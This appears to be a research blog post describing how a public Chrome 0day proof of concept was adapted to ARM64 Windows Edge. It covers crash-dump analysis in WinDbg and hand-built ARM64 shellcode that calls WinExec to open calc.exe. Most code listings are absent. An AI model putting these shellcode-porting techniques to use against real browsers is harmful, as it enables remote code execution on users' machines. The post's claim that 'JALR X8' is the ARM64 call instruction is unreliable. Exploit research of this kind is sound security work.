Given a recent Chrome 0day exploit, it may be worthwhile investigating if it might be exploitable on the ARM64 architecture.
Reproducing the crash
The first thing to check out is just opening the HTML file as-is on an ARM64 Windows VM. I'm using an M1 Mac Mini with Parallels for my investigation.
Well this is promising! It sure seems like it's attempting to run code that it doesn't understand. Which is predictable as ARM definitely shouldn't grok x86 or x86_64. Let's look at the beginning of our PoC exploit file:
Could it really be as easy as plopping in our own ARM shellcode to replace the original shellcode? Let's find out...
Investigating crash details
Attaching a debugger
Chrome-based browsers are tricky to attach a debugger to. When you open up a new tab, it spawns a new process to do the work of rendering the page. If you run windbg.exe with the
-o option, it should debug child processes.
However, in my testing, I couldn't get a working Edge process with windbg-attached processes. I could press
g a couple times to continue the presumed child processes, but eventually I'd get to the state where nothing was running, according to windbg:
Similarly, if Edge is run with the
--single-process option, it does end up spawning chrome, but it crashes immediately upon attempting to do anything. It is reported that --single-process isn't supported, so perhaps this isn't a surprise?
Looking at DMP files
Luckily, Edge will automatically create
DMP files in the
C:\Users\test\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports directory if crashes are encountered. As long as Windbg is configured to register itself with DMP files (run
windbg -IA to configure this), you can just double click on any DMP file to open the crash details.
By default, this is not the state of the machine at the crash! It's after the crash handler and minidump stuff has taken place. But we can simply click on
!analyze -v to get the state of the actual crash.
With this information, we can disassemble the instructions at the
pc register (View → Disassembly → Paste in
000072fea0b01000 (the value of PC)):
Our first 4 bytes of our shellcode are
0xFC, 0x48, 0x83, 0xE4, so the fact that Edge is attempting to execute the bytes
e48348fc is a good sign! (keep in mind that aarch64 Windows is little-endian, so reverse your byte ordering)
Testing our ARM64 shellcode
We've confirmed above that ARM64 Edge is attempting to execute the bytes that we provide. How about doing something useful?
An infinite loop
It's not terribly useful, but let's warm up with some pieces of code that are obviously executing. Which may end up being useful in our investigation.
https://disasm.pro/ can be useful if you know what instructions you want to use, and want the bytes to represent it. Or vice-versa.
The simplest infinite loop is the following instruction:
Which will jump to
0 bytes offset. Using disasm.pro, we see that it is encoded as
00 00 00 17
Let's update our PoC:
Now we can open our PoC file:
Given that we can't attach to Edge before it reaches the crash. And even if we could, ARM64 Windows doesn't technically support the M1 chip, so we can't viably trace through functions. Our analysis is limited to viewing a DMP file after the fact. If we can trigger a crash in an arbitrary point of our shellcode, we can get a static snapshot into what the computer was doing at this point.
The simplest way to crash is to dereference an invalid memory address. Let's look again at our crash details:
We want a register that we're not using, and points somewhere invalid.
x10 fits this bill (as do quite a few others). We're also not using
x11 so the following instruction will trigger a crash:
ldr x11, [x10]
This will dereference the
x10 register and place the value in x11. Since
0x386 this will crash. Let's test it out
In the browser:
Good! Now in the DMP file:
Success! This is a useful primitive to have. If our shellcode isn't working, we can place the crashing instruction wherever we like, and we can inspect the register values, stack, or other memory states.
Doing something useful with our shellcode
Simple shellcode in Windows often calls WinExec(). It takes two arguments:
- LPSTR lpCmdLine
- UINT uCmdShow
Our simple "pop" calc shellcode will just use
calc for the first argument, and
1 as the second (for a normal window).
aarch64 calling convention
If we look at old example shellcode for popping calc, we can see that this particular example:
- push 0
- push "
- push pointer to "
- Call hard-coded address of WinExec()
From this, we can see that arguments to function calls on x86 are stack-based. Argument 0 is what you'd like to run (calc), and argument 1 is the window property (0).
We can use this structure as our starting point for our shellcode, but it's important to realize that the aarch64 calling convention is register based. That is, arguments are passed in X0, X1, X2, etc...
Where to put our string
While we aren't passing our "calc" on the stack, it seemed reasonable to use the stack as a destination for where our stack lives. ARM doesn't have PUSH and POP, so you'll have to implement your own equivalent.
The problem with using the stack is that the stack pointer needs to be 16-byte aligned at all times. Otherwise, the app will crash. As outlined in the above article, a workaround for this is to use a register other than
SP , which allows you to have whatever alignment that you like. Just to keep things simple, let's go down this path:
Setting up our "shadow" stack
Let's copy SP to another register to use:
Let's look at our self-triggered crash dump now:
Here we can see that both
SP both point to
000000a267bfdac0 . So our shellcode instruction worked! If we keep that crashing instruction at the end of our shellcode, we can check each addition to our shellcode to confirm that it is doing what we expect it to do.
Getting pointer to "calc.exe\0"
Here we have four main operations:
- Put "calc.exe" on our "stack"
- Put a null on our "stack"
- Copy pointer to fake stack (X9) to X0
- Subtract 16 from our pointer so that we point to the beginning of "calc.exe"
Put 1 into X1
Our second argument to WinExec() should simply be 1 to get a normal window for calc.exe.
That's it. No fancy stack or fake-stack operations. Just move the number 1 into X1.
Get pointer to WinExec()
Just to start simple, we'll use a static address for WinExec(). This isn't viable in the real world due to ASLR, but we can cheat to start out. Attach to a msedge.exe process and ask windbg where WinExec() lives. It'll be valid until Windows reboots.
Here we can see that WinExec() lives at 6fde9ff0. But wait! That's just a 32-bit address! I don't believe it, so let's try Windbg Preview to get a second opinion:
Well that's better! I can see that WinExec() actually lives at
00007ffc`6fde9ff0 . But wait! Windbg Preview is disassembling the ARM64 instructions as if they were x86_64! I get the impression that ARM64 Windows is very much so a work in progress...
But we at least have the address of what we want to call:
Here we are constructing the address of
00007ffc`6fde9ff0 two bytes at a time, remembering that we're on a little-endian system. That is, start at the end of the address and work your way to the beginning.
- MOVZ 0x9FF0 into X8
X8: 00000000 00009ff0
- Shift left 16 bits and move (keep) 0x6FDE into X8
X8: 00000000 6FDE9FF0
- Shift left 32 bits and move (keep) 0x7FFC into X8
X8: 00007FFc 6FDE9FF0
At this point we're done. Originally moved zeros into the leading 2 bytes of the register, but then discovered that that's redundant as the first MOVZ instruction zeroed out the rest of the register.
Calling our function and then hanging.
A standard function call on ARM is to use JALR X8. Jump and Link Register, with X8 as the function pointer.
Putting it all together:
And in action on an ARM64 Windows system:
Adding ASLR support
In Part 2 of this exercise, we determine where WinExec() actually lives dynamically in the shellcode, so that it works on all ARM64 Windows versions, rather than just one example boot of my one VM (Windows re-shuffles ASLR at boot time, as opposed to execution time as it does on Linux).